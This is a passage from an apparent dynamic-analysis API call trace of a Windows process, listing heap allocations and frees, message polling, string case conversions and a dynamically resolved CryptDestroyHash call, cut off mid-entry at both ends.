Size=0x10) returned 0x24aa1a0 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.948] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.949] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.949] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.951] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.952] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.952] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.953] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.953] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0254.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0254.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.956] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.957] CryptDestroyHash (hHash=0xaa5860) returned 1 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: 